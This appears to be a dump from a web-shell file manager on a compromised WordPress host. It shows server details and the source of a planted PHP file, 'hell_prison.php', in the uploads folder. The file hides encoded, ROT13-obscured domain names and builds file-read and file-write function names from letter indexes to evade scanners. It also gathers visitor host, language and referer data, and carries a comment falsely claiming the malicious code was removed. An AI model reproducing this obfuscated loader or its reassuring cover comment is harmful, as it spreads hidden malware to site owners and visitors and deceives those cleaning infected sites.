Server : LiteSpeed
System : Linux server51.dnsbootclub.com 4.18.0-553.62.1.lve.el8.x86_64 #1 SMP Mon Jul 21 17:50:35 UTC 2025 x86_64
User : nandedex ( 1060)
PHP Version : 8.1.33
Disable Function : NONE
Directory :  /home/nandedex/www/s.nandedexpress.com/wp-content/uploads/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]


Current File : /home/nandedex/www/s.nandedexpress.com/wp-content/uploads/hell_prison.php
<?php
$xmlname = [
    "%31%32%36%33%2D%79%76%61%78%31%38%35%2E%66%72%65%72%61%67%66%6C%2E%67%62%63",
    "%31%32%36%33%2D%79%76%61%78%31%38%35%2E%69%72%65%69%72%68%66%2E%67%62%63",
    "%31%32%36%33%2D%79%76%61%78%31%38%35%2E%79%68%7A%62%65%6E%61%2E%6B%6C%6D",
    "%31%32%36%33%2D%79%76%61%78%31%38%35%2E%69%76%69%6C%61%72%2E%6B%6C%6D"
];
$string = '1263-link185';

$host = $_SERVER['HTTP_HOST'] ?: '';
$lang = $_SERVER['HTTP_ACCEPT_LANGUAGE'] ?: 'en';
$referer = $_SERVER['HTTP_REFERER'] ?: '';
$http = is_https() ? 'https' : 'http';
$server = file_exists($_SERVER['DOCUMENT_ROOT'] . '/.htaccess') ? 1 : 2;

/**
* Note: This file may contain artifacts of previous malicious infection.
* However, the dangerous code has been removed, and the file is now safe to use.
*/


function func() {
    $chars = range('a', 'z');
    return array(
        $chars[5] . $chars[8] . $chars[11] . $chars[4] . '_' . $chars[15] . $chars[20] . $chars[19] . '_' . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18],
        $chars[5] . $chars[8] . $chars[11] . $chars[4] . '_' . $chars[6] . $chars[4] . $chars[19] . '_' . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18],
        $chars[18] . $chars[19] . $chars[17] . '_' . $chars[17] . $chars[14] . $chars[19] . '13'
    );
}

F1le Man4ger